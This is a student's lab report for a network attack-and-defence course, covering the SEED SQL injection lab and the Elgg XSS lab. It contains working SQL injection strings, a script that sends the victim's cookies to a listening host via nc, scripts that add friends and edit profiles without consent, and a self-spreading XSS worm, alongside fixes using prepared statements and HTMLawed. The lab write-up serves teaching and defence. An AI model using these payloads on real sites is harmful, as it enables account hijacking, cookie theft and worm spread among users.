20232831 袁思承 2023-2024-2 《网络攻防实践》第10次作业


目录

  • 20232831 袁思承 2023-2024-2 《网络攻防实践》第10次作业
    • 1.实验内容
    • 2.实验过程
      • (1)SEED SQL注入攻击与防御实验
        • ①熟悉SQL语句
        • ②对SELECT语句的SQL注入攻击
        • ③对UPDATE语句的SQL注入攻击
        • ④SQL对抗
      • (2)SEED XSS跨站脚本攻击实验(Elgg)
        • ①发布恶意消息,显示警报窗口
        • ②弹窗显示cookie信息
        • ③窃取受害者的cookies
        • ④成为受害者的朋友
        • ⑤修改受害者的信息
        • ⑥编写XSS蠕虫。
        • ⑦对抗XSS攻击。
    • 3.学习中遇到的问题及解决
    • 4.学习感悟、思考等
    • 参考资料


20232831 袁思承 2023-2024-2 《网络攻防实践》第10次作业

1.实验内容

(1)SEED SQL注入攻击与防御实验
我们已经创建了一个Web应用程序,并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:

1、熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。
2、对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
3、对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
4、SQL对抗:修复上述SQL注入攻击漏洞。

(2)SEED XSS跨站脚本攻击实验(Elgg)
为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。

1、发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
2、弹窗显示cookie信息:将cookie信息显示。
3、窃取受害者的cookies:将cookie发送给攻击者。
4、成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
5、修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
6、编写XSS蠕虫。
7、对抗XSS攻击。

2.实验过程

(1)SEED SQL注入攻击与防御实验

①熟悉SQL语句

任务描述:

我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。

首先,我们使用以下命令,打开Ubuntu的阿帕奇apache2服务,并进行服务的状态查看:

sudo service apache2 start
sudo service apache2 status

在这里插入图片描述
成功启动后,我们在终端开始学习SQL语句,浅当复习本科学习过的各种数据库内容吧:

首先,打开数据库并使用root进行登录

mysql -u root -pseedubuntu

切换到Users权限,并查看所有的数据表,可以看到有两张表,Tables_in_Userscredential

use Users;
show tables;

在这里插入图片描述
分别查看这两张表里面都是什么

select * from Tables_in_Users;
select * from credential;

结果发现第一张表不存在…猜测因为是系统的数据表,导致权限不够,或者确实不存在…
而第二张表中就是一张信息表,包含ID、姓名、EID、薪资、生日等等信息。
在这里插入图片描述
再随便输入几条SQL语句,熟悉一下SQL:

select * from credential where Name = 'Alice';
select * from credential where ID=1;
select * from credential where ID <=3 ;

在这里插入图片描述

②对SELECT语句的SQL注入攻击

上述Web应用存在SQL注入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。

首先,在自带的火狐浏览器中打开以下网址,这里出现了一个登录界面

http://www.seedlabsqlinjection.com/

在这里插入图片描述
很明显,我们刚刚查询的数据库内容中,密码明显被加密过,登录肯定会失败。让我们输入Alice账户和密码进行检验,登录不上,正常。
在这里插入图片描述
因此,我们需要查看源码。输入以下命令进行unsafe_home.php的源代码的查看:

vim /var/www/SQLInjection/unsafe_home.php

在这里插入图片描述
可以看到,密码是被哈希过的hashed_pwd,所以不知道密码的情况下,我们无法通过查询到的hashed_pwd进行登录。
在这里插入图片描述
因此,我们使用SQL注入攻击,实现登录。我们来分析这个登录使用的select语句

$sql = "SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password
      FROM credential
      WHERE name= '$input_uname' and Password='$hashed_pwd'";

通过这个select语句我们可以知道,我们能输入以下内容进行sql注入。’ 单引号是为了终止当前的SQL语句,#是将后续的SQL语句注释。这样我们就能在SQL语句运行至WHERE name= ‘Alice’时被终止,且不用输入后续密码,直接就能成功运行这个SQL语句。

Alice'#

在这里插入图片描述
在这里插入图片描述
登陆成功!对selecrt语句的SQL注入攻击成功。

③对UPDATE语句的SQL注入攻击

通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

点击Edit Profile,发现只能修改以下内容:
在这里插入图片描述
于是,使用以下命令查看unsafe_edit_backend.php文件的源代码,检查Update SQL语句的内容,可以看到内容如下:

vim /var/www/SQLInjection/unsafe_edit_backend.php

在这里插入图片描述
我们仿照上述实验②的做法,进行SQL注入攻击,使用以下代码进行Alice的薪资和SSN号的修改,代码如下。同样的,’ 单引号表示SQL语句的中断,#表示SQL语句后续内容的省略:

', Salary='999999' where name='Alice'; #
', SSN='20232831' where name='Alice'; #

修改结果截图如下:
在这里插入图片描述
薪资修改成功,成功月入百万
在这里插入图片描述
这里发现,SQL注入随便放在任何一个文本框都可以实现,所以只要能够成功进行SQL注入,该SQL语句是否对应图中的修改框的修改位置,已经不重要了。
在这里插入图片描述
修改SSN号为我的学号,成功:
在这里插入图片描述
对UPDATE语句的SQL注入攻击实验结束,且试验成功。

④SQL对抗

修复上述SQL注入攻击漏洞。
我们可以观察php文件的源代码,可以发现,它们对SQL语句的数据和命令的判定并没有分开,而是混在一起,而数据库无法分清楚,这段SQL语句中哪段是用用户的数据,哪段又是SQL的命令。这就造成了SQL注入的发生,因此,我们用php语言中的bind_param方法来绑定参数,并用?来代替参数,这样就能修复SQL注入攻击漏洞。

对select的修复如下,我们需要使用以下代码替换掉SQL部分的代码,或者直接在上面修改即可:

$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password 
	FROM credential 
	WHERE name= ? and Password= ?");
$sql->bind_param("ss", $input_uname, $hashed_pwd);

在这里插入图片描述
再次登录,发现失败,修复成功
在这里插入图片描述
在这里插入图片描述

对update的修复内容如下:

$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

在这里插入图片描述

再次修改:
在这里插入图片描述
点击Save后,一直卡在空白页面,可以发现Update对数据库的修改失败
在这里插入图片描述

文件的修改过程:
在这里插入图片描述

实验成功。

(2)SEED XSS跨站脚本攻击实验(Elgg)

①发布恶意消息,显示警报窗口

任务:
在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。

我们打开以下网站,并用从数据库中查询到的用户进行登录,除了Admin管理员意外,所有用户的登陆密码都是seed+用户名
例如,Alice的密码就是seedalice,Samy的密码就是seedsamy,而Admin的密码是seedelgg。当然,用户Ted无法登录,通过Admin查询所有用户发现,他并没在这个网站注册过。

http://www.xsslabelgg.com

在这里插入图片描述

使用Alice账户登陆后,显示界面如下:
在这里插入图片描述

首先,我们点击Alice的头像下面的Edit profile
在这里插入图片描述
Brief description输入以下XSS攻击代码,让系统给出警告信息。

在这里插入图片描述

<script> alert('xss');</script>

系统给出了警告信息:xss
在这里插入图片描述

②弹窗显示cookie信息

任务:将cookie信息显示。

我们将xss攻击内容改成以下内容

<script> alert(document.cookie);</script>

在这里插入图片描述
再次进入Alice主页,系统展示cookie信息如下:
在这里插入图片描述

③窃取受害者的cookies

任务:将cookie发送给攻击者。

首先,我们查看当前SeedUbuntu的IP:
在这里插入图片描述

查询得知,为192.168.200.3,因此,我们构造以下代码:

通过以下代码,将受害者Alice的cookies发送给攻击者Boby。代码将受害者Alice的cookie放入document.write,并发送给攻击者Boby。且端口号设置为了500,此后我们要监听这个端口,从而获取受害者的cookies

<script>document.write('<img src=http://192.168.200.3:500?c='+escape(document.cookie) + ' >');</script>

这就要求我们将以下代码放在攻击者Boby的Brief description中,然后再登录受害者Alice的账户,用Alice访问Boby。

首先,登录Boby,并用以下命令修改Brief description:

<script>document.write('<img src=http://192.168.200.3:500?c='+escape(document.cookie) + ' >');</script>

在这里插入图片描述

输入以下命令监听端口500,然后用Alice访问Boby后,从而获取到了cookies

nc -l 500 -v

在这里插入图片描述

使用Alice账户,搜索并访问Boby
在这里插入图片描述
成功访问Boby,且成功获取受害者Alice的cookies
在这里插入图片描述
实验结束。

④成为受害者的朋友

任务:
使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。

首先,我们观察一下添加朋友的过程:
我们使用Alice添加Boby为好友,同时,按下F12打开浏览器的开发者工具,查看添加好友过程中发出了什么信息:
在这里插入图片描述
可以看到,出现了一个POST请求,我们详细分析一下这个请求:
在这里插入图片描述

http://www.xsslabelgg.com/action/friends/add?friend=45&__elgg_ts=1715781954&__elgg_token=FXR_Mu08DjK8eIZqjnK6sg

从图中这个request url信息可知,post的参数分别为
friend=?,__elgg_ts=?,__elgg_token=?

因此,我们可以通过以下使用js程序代码,获取这仨个参数,并通过url直接强行加好友,无需对方点击“添加好友”按钮。

<p><script type="text/javascript">window.onload = function () {
    var Ajax = null;
    var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
    var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
   var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;
Ajax = new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send();
}</script></p>

于是,在Alice的About me栏中添加这段代码。(注意,这里必须点击About me框右上角的edit html,才可以进行添加这段代码,否则添加不成功
在这里插入图片描述

切换Samy账户,首先可以看到,我们并没有任何一个好友。
在这里插入图片描述
访问Alice的主页,就会发现自动添加了Alice为好友,甚至Alice自己与自己也添加了好友,这是非常离谱的操作。
在这里插入图片描述
在这里插入图片描述
使用js程序加受害者为朋友,试验成功!

⑤修改受害者的信息

任务:
使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。

与第④个实验相同,这里也是修改Alice的about me,从而实现受害者被添加资料。

首先,查看修改资料的日志,根据日志,使用以下代码构造js程序
在这里插入图片描述
根据F12的信息,可以得知,构造js程序如下:

<script type="text/javascript">
    window.onload = function(){
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var content= token + ts + "name=" + userName + "&description=<p>hhh,20232831ysc is here!</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        var samyGuid=44;
        if(elgg.session.user.guid!=samyGuid)
        {
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
	}
</script>

在这里插入图片描述
使用Samy访问Alice,发现主页被修改
在这里插入图片描述
访问Alice后,主页被修改截图如下:
在这里插入图片描述
js程序修改受害者主页完成!

⑥编写XSS蠕虫。

任务:编写XSS蠕虫
根据上述实验的经验,编写蠕虫代码如下,这段代码实现的功能与⑤类似,也是修改受害者主页,但是能够在受害者之间传播,而不用必须访问攻击者的主页,访问了受害者的主页,你也会变成下一个受害者,具有传染性:

<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>";
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var content= token + ts + "&name=" + userName + "&description=<p>zhe li shi 20232831ysc"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        var samyGuid=44;
        if(elgg.session.user.guid!=samyGuid){
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }</script>

同样,将其放入Alice的About me,然后用Boby去访问Alice,用Samy访问Boby,观察感染情况:
在这里插入图片描述
Boby账户访问Alice后
在这里插入图片描述
Samy账户访问Boby后
在这里插入图片描述
发现传染性!蠕虫构造成功!

⑦对抗XSS攻击。

对抗XSS攻击有以下方法:

1、输入验证和 sanitization
验证用户输入:确保用户输入的验证和sanitization,以防止恶意代码被注入。
使用白名单方法:只允许特定的、可靠的输入被处理,并拒绝所有其他输入。
使用sanitizer库:使用可靠的sanitizer库来清洁和sanit化用户输入。
2、输出编码
HTML转义:使用HTML转义来防止恶意代码被执行。
使用安全的编码方案:使用安全的编码方案,例如HTML实体编码或Unicode编码。
3、内容安全策略(CSP)
定义CSP策略:定义CSP策略以指定哪些内容来源被允许在网页中执行。
使用CSP头:使用CSP头来定义策略并强制执行。
4、HTTPOnly Cookies
设置HTTPOnly标志:在Cookie中设置HTTPOnly标志,以防止JavaScript访问它们。

还有很多方法 ,这里我们用Web网页内部的HTMLawed进行对抗攻击。

HTMLawed是一个PHP库,它可以帮助防止XSS(跨站脚本攻击)攻击通过过滤和sanitizing HTML输入。

方法如下:
首先,我们登录管理员账户Admin
在这里插入图片描述
从Account进入Administration管理员界面
在这里插入图片描述
在这里插入图片描述
点击Plugins
在这里插入图片描述
点击Activate,将HTMLawed激活
在这里插入图片描述
激活后,重新进行XSS攻击实验,例如,这里重新进行修改受害者主页信息的XSS攻击,就会发现,XSS攻击已经失效。对抗XSS攻击成功!

即,重新让Samy访问Alice,发现无法进行主页修改。
在这里插入图片描述

在这里插入图片描述
XSS对抗成功。

3.学习中遇到的问题及解决

  • 问题1:About me框添加js程序代码失败
  • 问题1解决方案:需要打开About me框右上角的edit html模式,否则Visual editor模式下是无法保存js程序代码的。

4.学习感悟、思考等

通过本次实验,我学习了SQL注入、Web渗透,蠕虫病毒等等相关知识,让我明白了网络安全隐患无处不在,不仅企业需要严防数据库安全问题,我们每一位网民也需要小心访问Web页面,以防出现Web方面的XSS攻击或者被蠕虫病毒感染。

参考资料

  • Chatgpt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/632359.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

5年增100倍6秒卖1瓶酒,酣客的“FFC模式”是什么

酣客酱酒销售模式&#xff0c;白酒FFC模式&#xff0c;白酒新零售模式设计 坐标&#xff1a;厦门&#xff0c;我是易创客肖琳 深耕社交新零售行业10年&#xff0c;主要提供新零售系统工具及顶层商业模式设计、全案策划运营陪跑等。 不知从何时起&#xff0c;营销圈开始有这么一…

docker容器与centos宿主机时间一致设置

1、查看宿主机的系统时间 date -R 2、进入到容器中查看容器系统时间 docker exec -it storage /bin/bash date -R 3、查看容器系统时区 cat /etc/timezone 4、查看宿主机所在时区 timedatectl 5、创建容器时间&#xff0c;并退出进入的容器 6、将宿主日期复制到容器内部&…

Git—常用命令

官方 Git - Book (git-scm.com) 常用命令 命令作用git config --global user.name 用户名设置用户作者git config --global user.email 邮箱设置用户邮箱 git init初始化本地仓库git status查看本地仓库状态 git add 文件名 添加到暂存区git commit -m "提交日志…

基于PHP+MySQL组合开发的多用户自定义商城系统源码 附带源代码包以及搭建教程

系统概述 互联网技术的飞速发展&#xff0c;电子商务已成为人们日常生活中不可或缺的一部分。商城系统作为电子商务的核心&#xff0c;其开发技术和用户体验直接影响着电商平台的竞争力和用户满意度。本文旨在介绍一个基于PHPMySQL组合开发的多用户自定义商城系统&#xff0c;…

深入理解 House of Cat

Index 序言利用 FSOP 调用 House of Cat利用条件伪造IO流条件完整调用链分析 模板System (one_gadget) 模板ORW模板 Demo & Exp利用 __malloc_assert 调用 House of Cat例题&#xff1a;题目思路Exp 序言 原文章&#xff1a;深入理解 House of Cat 随着 GNU 持续不断的更…

GeoServer /geoserver/wms RCE漏洞复现(CVE-2022-24816)

0x01 产品简介 GeoServer是一款开源的地理数据服务器软件,主要用于发布、共享和处理各种地理空间数据。它支持众多的地图和空间数据标准,能够使各种设备通过网络来浏览和使用这些地理信息数据。 0x02 漏洞概述 GeoServer /geoserver/wms 接口处存在远程代码执行漏洞,未经…

好看的html网站维护源码

源码介绍 好看的html网站维护源码&#xff0c;源码由HTMLCSSJS组成&#xff0c;记事本打开源码文件可以进行内容文字之类的修改&#xff0c;双击html文件可以本地运行效果&#xff0c;也可以上传到服务器里面&#xff0c; 源码截图 源码下载 好看的html网站维护源码

Blender学习入门:让图片动起来

Blender简介 Blender 是一款开源的三维计算机图形软件&#xff0c;它提供了广泛的功能&#xff0c;包括建模、动画、渲染、视频编辑等。Blender还支持Python编程接口&#xff0c;允许用户通过编写脚本来控制和定制软件的各个方面。 Blender的功能非常强大&#xff0c;它被广泛…

为何Linux成为你不可或缺的技能

在数字化飞速发展的今天&#xff0c;无论你是IT行业的精英&#xff0c;还是其他领域的专业人士&#xff0c;掌握Linux都已经成为一项至关重要的技能。那么&#xff0c;为什么一定要学会Linux呢&#xff1f;以下文章仅供参考 1. 开源的力量&#xff1a;无限的可能性 Linux是一…

02 VUE学习:模板语法

模板语法 Vue 使用一种基于 HTML 的模板语法&#xff0c;使我们能够声明式地将其组件实例的数据绑定到呈现的 DOM 上。所有的 Vue 模板都是语法层面合法的 HTML&#xff0c;可以被符合规范的浏览器和 HTML 解析器解析。 在底层机制中&#xff0c;Vue 会将模板编译成高度优化的…

【Altium】AD-检查原理图中元器件未连接的Passive Pin

1、 文档目标 如何让原理图编译时找出元器件上未连接的Passive Pin 2、 问题场景 当引脚属性&#xff08;Pin type&#xff09;为passive时&#xff0c;原理图编译的默认规则是不会去检查它们是否有连接的。在实际设计过程中&#xff0c;经常会有导线虚连&#xff0c;漏连的事…

今日分享【Vue3基础知识】

常用地址及工具&#xff1a; [vue3官网] https://cn.vuejs.org/ vue3官网[setup 基本使用] https://juejin.cn/post/7002490039066165279 setup基本使用[vite中文官网] https://cn.vitejs.dev/ Vite官网 1、如何使用vue3 vite //要构建一个 Vite Vue 项目&#xff0c;运行…

react18【系列实用教程】useMemo —— 缓存数据 (2024最新版)

为什么添加了 memo &#xff0c;子组件2依然重新渲染了呢&#xff1f; 因为父组件向子组件2传递了引用类型的数据 const userInfo {name: "朝阳",};<Child2 userInfo{userInfo} />memo() 函数的本质是通过校验Props中数据的内存地址是否改变来决定组件是否重新…

实战10:基于机器学习参数优化的疾病预测实战-完整代码数据-计算机毕设

直接看演示视频: 基于机器学习参数优化的疾病预测实战-完整代码数据-计算机毕设 直接看实验结果: 数据: 没加参数优化之前的模型效果: 优化之后的效果: 数据分析:

5月17日世界电信日:共筑数字桥梁,深圳市企讯通科技引领通讯创新潮流

在全球信息化浪潮中&#xff0c;每年的5月17日被赋予了非凡的意义——“世界电信日”。这不仅仅是全球电信业发展成果展示与未来趋势探讨的盛会&#xff0c;更是对未来通信领域无限可能的展望。自1969年设立以来&#xff0c;世界电信日不断激励着各国在信息通信技术&#xff08…

618好物推荐大赏:2024年必囤好物一网打尽,购物攻略助你抢购无忧!

在618购物狂欢节来临之际&#xff0c;我为大家精心挑选了一系列好物&#xff0c;它们不仅品质卓越&#xff0c;更能在日常生活中为我们带来无限便利与乐趣。这里的每一款产品都经过我严格筛选&#xff0c;只为给你最优质的购物体验。让我们一起在这个618&#xff0c;发现生活中…

【编程题-错题集】kotori和气球(组合数学)

牛客对应题目链接&#xff1a;kotori和气球 (nowcoder.com) 一、分析题目 简单的排列组合问题&#xff0c;结果等于 n 与 m-1 个 n - 1 的乘积。 二、代码 //值得学习的代码 #include <iostream>using namespace std;const int MOD 109;int main() {int n, m;cin >…

Redis基于Redisson的限流和限流算法

限流 限流是在高并发或者某个瞬间高并发时&#xff0c;为了保证系统的稳定性&#xff0c;对超出服务处理能力之外的请求进行拦截&#xff0c;对访问服务的流量进行限制。 常见的限流算法有四种&#xff1a;固定窗口限流算法、滑动窗口限流算法、漏桶限流算法和令牌桶限流算法…

为何要使用静态或动态住宅IP代理来运营亚马逊?

跨境电商作为当前主流的行业&#xff0c;在运营亚马逊等跨境电商平台时&#xff0c;使用静态或动态住宅IP代理成为了一个重要的策略。这种策略不仅有助于提升运营效率&#xff0c;还能在一定程度上保护卖家的隐私和账号安全。 静态住宅IP代理在亚马逊运营中的优势。 静态住宅I…

亚马逊Prime Day旺季备货遭遇美国海关查验高峰,应对策略全攻略!

随着全球化贸易的日益繁荣&#xff0c;跨境电商企业在旺季备货时面临着巨大的挑战&#xff0c;尤其是当遇到美国海关查验潮时&#xff0c;如何应对成为众多商家关注的焦点。本文将从分析美国海关查验的原因入手&#xff0c;为商家提供一系列应对策略和建议。 一、美国海关查验潮…